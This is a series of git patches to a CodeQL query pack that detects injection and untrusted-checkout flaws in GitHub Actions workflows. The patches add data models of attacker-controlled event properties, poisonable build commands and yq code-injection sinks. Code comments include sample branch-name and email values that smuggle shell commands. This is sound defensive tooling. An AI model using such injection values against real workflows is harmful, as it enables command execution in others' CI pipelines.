1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 4b8239b7f6c..21e0b8bb0e9 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.0 + version: 1.0.1 codeql/dataflow: - version: 1.0.0 + version: 1.0.1 codeql/ssa: - version: 1.0.0 + version: 1.0.1 codeql/typetracking: - version: 1.0.0 + version: 1.0.1 codeql/util: - version: 1.0.0 + version: 1.0.1 codeql/yaml: - version: 1.0.0 + version: 1.0.1 compiled: false From a99d293309942f7879d670ba8c10645e54820fb8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 16:33:45 +0200 Subject: [PATCH 0358/1267] Bump to dataflow version 1.0.1 --- .../actions/dataflow/internal/DataFlowPrivate.qll | 10 ++++++++++ ql/lib/qlpack.yml | 1 + ql/{src => lib}/semmlecode.javascript.dbscheme | 0 ql/{src => lib}/semmlecode.javascript.dbscheme.stats | 0 ql/src/qlpack.yml | 1 - 5 files changed, 11 insertions(+), 1 deletion(-) rename ql/{src => lib}/semmlecode.javascript.dbscheme (100%) rename ql/{src => lib}/semmlecode.javascript.dbscheme.stats (100%) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 17b29f57025..ec889f19205 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -84,6 +84,11 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a best-effort total ordering. */ int totalorder() { none() } + + /** Gets the location of this call. */ + Location getLocation() { + result = this.getLocation() + } } /** @@ -113,6 +118,11 @@ class DataFlowCallable instanceof Cfg::CfgScope { /** Gets a best-effort total ordering. */ int totalorder() { none() } + + /** Gets the location of this callable. */ + Location getLocation() { + result = this.getLocation() + } } newtype TReturnKind = TNormalReturn() diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5f3825a9157..3c37e64b856 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -9,6 +9,7 @@ dependencies: codeql/controlflow: ^1.0.1 codeql/dataflow: ^1.0.1 extractor: javascript +dbscheme: semmlecode.javascript.dbscheme groups: javascript dataExtensions: - ext/manual/*.model.yml diff --git a/ql/src/semmlecode.javascript.dbscheme b/ql/lib/semmlecode.javascript.dbscheme similarity index 100% rename from ql/src/semmlecode.javascript.dbscheme rename to ql/lib/semmlecode.javascript.dbscheme diff --git a/ql/src/semmlecode.javascript.dbscheme.stats b/ql/lib/semmlecode.javascript.dbscheme.stats similarity index 100% rename from ql/src/semmlecode.javascript.dbscheme.stats rename to ql/lib/semmlecode.javascript.dbscheme.stats diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 899f62cf9ba..f7464c78452 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -5,7 +5,6 @@ version: 0.1.7 groups: [actions, queries] suites: codeql-suites extractor: javascript -dbscheme: semmlecode.javascript.dbscheme defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: github/actions-all: ${workspace} From d998373162cd1660881a14b3feac29da1efac113 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:08:40 +0200 Subject: [PATCH 0359/1267] Move event sources to config files --- ql/lib/codeql/actions/config/Config.qll | 10 ++ .../actions/config/ConfigExtensions.qll | 5 + .../codeql/actions/dataflow/FlowSources.qll | 154 +----------------- .../ext/config/untrusted_event_properties.yml | 83 ++++++++++ 4 files changed, 103 insertions(+), 149 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_event_properties.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index d6a85c426c6..dd63fda93d1 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -72,3 +72,13 @@ predicate poisonableLocalScriptsDataModel(string regexp, int group) { predicate poisonableActionsDataModel(string action) { Extensions::poisonableActionsDataModel(action) } + +/** + * MaD models for for event properties that can be user-controlled. + * Fields: + * - property: event property + * - kind: property kind + */ +predicate untrustedEventPropertiesDataModel(string property, string kind) { + Extensions::untrustedEventPropertiesDataModel(property, kind) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 3ca4b6a7559..26e77ce7235 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -39,3 +39,8 @@ extensible predicate poisonableLocalScriptsDataModel(string regexp, int group); */ extensible predicate poisonableActionsDataModel(string action); +/** + * Holds for event properties that can be user-controlled. + */ +extensible predicate untrustedEventPropertiesDataModel(string property, string kind); + diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b09664359ab..79934ca586b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -20,136 +20,6 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -private string titleEvent() { - result = - [ - "github\\.event\\.issue\\.title", // issue - "github\\.event\\.pull_request\\.title", // pull request - "github\\.event\\.discussion\\.title", // discussion - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title", "github\\.event\\.workflow_run\\.display_title", - ] -} - -private string urlEvent() { result = "github\\.event\\.pull_request\\.head\\.repo\\.homepage" } - -private string textEvent() { - result = - [ - "github\\.event\\.issue\\.body", // body - "github\\.event\\.pull_request\\.body", // body - "github\\.event\\.discussion\\.body", // body - "github\\.event\\.review\\.body", // body - "github\\.event\\.comment\\.body", // body - "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage - "github\\.event\\.head_commit\\.message", // message - "github\\.event\\.workflow_run\\.head_commit\\.message", // message - "github\\.event\\.pull_request\\.head\\.repo\\.description", // description - "github\\.event\\.workflow_run\\.head_repository\\.description", // description - "github\\.event\\.client_payload\\[[0-9]+\\]", // payload - "github\\.event\\.client_payload", // payload - ] -} - -private string branchEvent() { - // branch - // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names - // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. - // - They must contain at least one / - // - They cannot have two consecutive dots .. anywhere. - // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. - // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. - // - They cannot begin or end with a slash / or contain multiple consecutive slashes - // - They cannot end with a dot . - // - They cannot contain a sequence @{ - // - They cannot be the single character @ - // - They cannot contain a \ - // eg: zzz";echo${IFS}"hello";# would be a valid branch name - result = - [ - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.merge_group\\.head_ref", - ] -} - -private string labelEvent() { - // - They cannot contain a escaping \ - result = ["github\\.event\\.pull_request\\.head\\.label",] -} - -private string emailEvent() { - // `echo${IFS}hello`@domain.com - result = - [ - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.merge_group\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - ] -} - -private string usernameEvent() { - // All characters must be either a hyphen (-) or alphanumeric - result = - [ - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", - "github\\.event\\.merge_group\\.committer\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - ] -} - -private string pathEvent() { - result = - [ - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", - "github\\.event\\.workflow_run\\.referenced_workflows\\.path", - ] -} - -private string jsonEvent() { - result = - [ - "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", - "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", - "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.issue", "github\\.event\\.merge_group", - "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", - "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", - "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", - "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_commit", - "github\\.event\\.workflow_run\\.head_commit\\.author", - "github\\.event\\.workflow_run\\.head_commit\\.committer", - "github\\.event\\.workflow_run\\.head_repository", - "github\\.event\\.workflow_run\\.pull_requests", - ] - or - result = titleEvent() - or - result = urlEvent() - or - result = textEvent() - or - result = branchEvent() - or - result = labelEvent() - or - result = emailEvent() - or - result = usernameEvent() - or - result = pathEvent() -} - class GitHubCtxSource extends RemoteFlowSource { string flag; @@ -184,23 +54,8 @@ class GitHubEventCtxSource extends RemoteFlowSource { or exists(e.getEnclosingCompositeAction()) ) and - ( - regexp = titleEvent() and flag = "title" - or - regexp = urlEvent() and flag = "url" - or - regexp = textEvent() and flag = "text" - or - regexp = branchEvent() and flag = "branch" - or - regexp = labelEvent() and flag = "label" - or - regexp = emailEvent() and flag = "email" - or - regexp = usernameEvent() and flag = "username" - or - regexp = pathEvent() and flag = "filename" - ) and + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") ) } @@ -212,9 +67,10 @@ class GitHubEventJsonSource extends RemoteFlowSource { string flag; GitHubEventJsonSource() { - exists(Expression e, string context | + exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and + untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` @@ -223,7 +79,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and - normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(jsonEvent()) + ".*") + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") or // github.event is taintes for all triggers contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml new file mode 100644 index 00000000000..739544455da --- /dev/null +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -0,0 +1,83 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: untrustedEventPropertiesDataModel + data: + # TITLE + - ["github\\.event\\.issue\\.title", "title"] + - ["github\\.event\\.pull_request\\.title", "title"] + - ["github\\.event\\.discussion\\.title", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"] + - ["github\\.event\\.workflow_run\\.display_title", "title"] + # URL + - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"] + # TEXT + - ["github\\.event\\.issue\\.body", "text"] + - ["github\\.event\\.pull_request\\.body", "text"] + - ["github\\.event\\.discussion\\.body", "text"] + - ["github\\.event\\.review\\.body", "text"] + - ["github\\.event\\.comment\\.body", "text"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.message", "text"] + - ["github\\.event\\.head_commit\\.message", "text"] + - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"] + - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"] + - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] + - ["github\\.event\\.client_payload\\[[0-9]+\\]", "text"] + - ["github\\.event\\.client_payload", "text"] + # BRANCH + - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] + - ["github\\.event\\.pull_request\\.head\\.ref", "branch"] + - ["github\\.event\\.workflow_run\\.head_branch", "branch"] + - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"] + - ["github\\.event\\.merge_group\\.head_ref", "branch"] + # LABEL + - ["github\\.event\\.pull_request\\.head\\.label", "label"] + # EMAIL + - ["github\\.event\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.head_commit\\.committer\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", "email"] + - ["github\\.event\\.merge_group\\.committer\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "email"] + # USERNAME + - ["github\\.event\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.head_commit\\.committer\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", "username"] + - ["github\\.event\\.merge_group\\.committer\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", "username"] + # PATH + - ["github\\.event\\.workflow\\.path", "path"] + - ["github\\.event\\.workflow_run\\.path", "path"] + - ["github\\.event\\.workflow_run\\.referenced_workflows\\.path", "path"] + # JSON + - ["github", "json"] + - ["github\\.event", "json"] + - ["github\\.event\\.client_payload", "json"] + - ["github\\.event\\.comment", "json"] + - ["github\\.event\\.commits", "json"] + - ["github\\.event\\.discussion", "json"] + - ["github\\.event\\.head_commit", "json"] + - ["github\\.event\\.head_commit\\.author", "json"] + - ["github\\.event\\.head_commit\\.committer", "json"] + - ["github\\.event\\.issue", "json"] + - ["github\\.event\\.merge_group", "json"] + - ["github\\.event\\.merge_group\\.committer", "json"] + - ["github\\.event\\.pull_request", "json"] + - ["github\\.event\\.pull_request\\.head", "json"] + - ["github\\.event\\.pull_request\\.head\\.repo", "json"] + - ["github\\.event\\.pages", "json"] + - ["github\\.event\\.review", "json"] + - ["github\\.event\\.workflow", "json"] + - ["github\\.event\\.workflow_run", "json"] + - ["github\\.event\\.workflow_run\\.head_branch", "json"] + - ["github\\.event\\.workflow_run\\.head_commit", "json"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author", "json"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"] + - ["github\\.event\\.workflow_run\\.head_repository", "json"] + - ["github\\.event\\.workflow_run\\.pull_requests", "json"] + + From 682236e432e97cef2d7af4b6892d2c2ba7887c08 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:25:55 +0200 Subject: [PATCH 0360/1267] New poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 39 +++++++++++++++----------- 1 file changed, 23 insertions(+), 16 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 9a9af08872c..9ad251007e5 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -17,29 +17,36 @@ extensions: # source: https://boostsecurityio.github.io/lotp/ data: - ["ant "] - - ["bundle install"] - - ["bundle exec "] + - ["bundle "] - ["cargo "] + - ["checkov "] + - ["eslint "] - ["go generate"] + - ["go run"] - ["gomplate "] - ["gradle "] - - ["java -jar "] + - ["java -jar"] - ["make "] - - ["mkdocs build"] - - ["msbuild "] - - ["mvn "] - - ["npm i(nstall)?(\\b|$)"] - - ["npm run "] - - ["npm ci(\\b|$)"] - - ["pip install -r "] + - ["mkdocs"] + - ["msbuild"] + - ["mvn"] + - ["mypy"] + - ["npm i(nstall)?"] + - ["npm run"] + - ["npm ci"] + - ["pre-commit"] + - ["prettier"] + - ["pip install -r"] - ["pip install --requirement"] - - ["poetry install"] - - ["poetry run"] - - ["pre-commit run"] - - ["pre-commit install"] + - ["poetry"] + - ["pylint"] - ["pytest"] - - ["terraform plan"] - - ["terraform apply"] + - ["rake "] + - ["rails db:create"] + - ["rails assets:precompile"] + - ["rubocop "] + - ["terraform "] + - ["tflint"] - ["yarn "] - addsTo: pack: github/actions-all From 04c4cedb41a55c7455a021ae69835c680576e717 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:26:04 +0200 Subject: [PATCH 0361/1267] New code injection sink --- ql/lib/ext/manual/mikefarah_yq.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/lib/ext/manual/mikefarah_yq.model.yml diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/ql/lib/ext/manual/mikefarah_yq.model.yml new file mode 100644 index 00000000000..35aecbdd968 --- /dev/null +++ b/ql/lib/ext/manual/mikefarah_yq.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"] + From 31fe5952dc61f9cbbb59b2036c6ca8fff9b7616c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:32:03 +0200 Subject: [PATCH 0362/1267] New poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 9ad251007e5..11f17ae2623 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -10,6 +10,7 @@ extensions: - ["bridgecrewio/checkov-action"] - ["ruby/setup-ruby"] - ["actions/jekyll-build-pages"] + - ["qcastel/github-actions-maven/actions/maven"] - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel From c57e4929cb01c2c291c76ef75c58012faabc8acb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:32:21 +0200 Subject: [PATCH 0363/1267] New code injection sink --- ql/lib/ext/manual/devorbitus_yq-action-output.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 ql/lib/ext/manual/devorbitus_yq-action-output.model.yml diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml new file mode 100644 index 00000000000..412db371965 --- /dev/null +++ b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"] + From b64f53e03e83073984e309301ffdaefbdc7db806 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 17:33:08 +0200 Subject: [PATCH 0364/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3c37e64b856..30120f7d321 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.7 +version: 0.1.8 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f7464c78452..dad05ff4af3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.7 +version: 0.1.8 groups: [actions, queries] suites: codeql-suites extractor: javascript From effa1e135670cfdaa01a83d42a156be6ff7eff87 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:20 +0200 Subject: [PATCH 0365/1267] Move ControlChecks to its own file --- .../codeql/actions/security/ControlChecks.qll | 65 +++++++++++++++++++ .../security/UntrustedCheckoutQuery.qll | 63 ------------------ .../Security/CWE-285/ImproperAccessControl.ql | 1 + .../UntrustedCheckoutTOCTOUCritical.ql | 1 + .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 1 + .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../Security/CWE-829/UntrustedCheckoutHigh.ql | 1 + .../CWE-829/UntrustedCheckoutMedium.ql | 1 + 8 files changed, 71 insertions(+), 63 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ControlChecks.qll diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll new file mode 100644 index 00000000000..fdafda1fc27 --- /dev/null +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -0,0 +1,65 @@ +import actions + +/** An If node that contains an actor, user or label check */ +abstract class ControlCheck extends If { + predicate dominates(Step step) { + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + } +} + +class LabelControlCheck extends ControlCheck { + LabelControlCheck() { + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + // eg: github.event.label.name == 'safe to test' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" + ], _, _) + ) + } +} + +class ActorControlCheck extends ControlCheck { + ActorControlCheck() { + // eg: github.actor == 'dependabot[bot]' + // eg: github.triggering_actor == 'CI Agent' + // eg: github.event.pull_request.user.login == 'mybot' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", + "\\bgithub\\.event\\.comment\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class RepositoryControlCheck extends ControlCheck { + RepositoryControlCheck() { + // eg: github.repository == 'test/foo' + exists( + normalizeExpr(this.getCondition()) + .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) + ) + } +} + +class AssociationControlCheck extends ControlCheck { + AssociationControlCheck() { + // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.comment\\.author_association\\b", + "\\bgithub\\.event\\.issue\\.author_association\\b", + "\\bgithub\\.event\\.pull_request\\.author_association\\b", + ], _, _) + ) + } +} + diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 90b0a74d0ec..fcccc5d8a14 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -233,66 +233,3 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { ) } } - -/** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { - predicate dominates(Step step) { - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this - } -} - -class LabelControlCheck extends ControlCheck { - LabelControlCheck() { - // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - // eg: github.event.label.name == 'safe to test' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" - ], _, _) - ) - } -} - -class ActorControlCheck extends ControlCheck { - ActorControlCheck() { - // eg: github.actor == 'dependabot[bot]' - // eg: github.triggering_actor == 'CI Agent' - // eg: github.event.pull_request.user.login == 'mybot' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", - "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", - ], _, _) - ) - } -} - -class RepositoryControlCheck extends ControlCheck { - RepositoryControlCheck() { - // eg: github.repository == 'test/foo' - exists( - normalizeExpr(this.getCondition()) - .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) - ) - } -} - -class AssociationControlCheck extends ControlCheck { - AssociationControlCheck() { - // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.comment\\.author_association\\b", - "\\bgithub\\.event\\.issue\\.author_association\\b", - "\\bgithub\\.event\\.pull_request\\.author_association\\b", - ], _, _) - ) - } -} diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 88ac3cee04d..16ae5c5fe9b 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -12,6 +12,7 @@ */ import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.ControlChecks from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index ff9148ab583..3a049f67dea 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from ControlCheck check, MutableRefCheckoutStep checkout where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index ca1b855c6ec..b9a1e4c6301 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -14,6 +14,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from ControlCheck check, MutableRefCheckoutStep checkout where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 9f7f3fd8cee..3a87b30be97 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 980560dac9a..cb2f1cdaf95 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from LocalJob j, PRHeadCheckoutStep checkout where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 89d2e741306..3edde8dcf54 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -16,6 +16,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks from LocalJob j, PRHeadCheckoutStep checkout where From a9ea9a1f8a7e781e072de04ab682db08111daa6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 27 Jun 2024 22:53:32 +0200 Subject: [PATCH 0366/1267] Update expected test files --- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 1 file changed, 1 insertion(+) diff --git 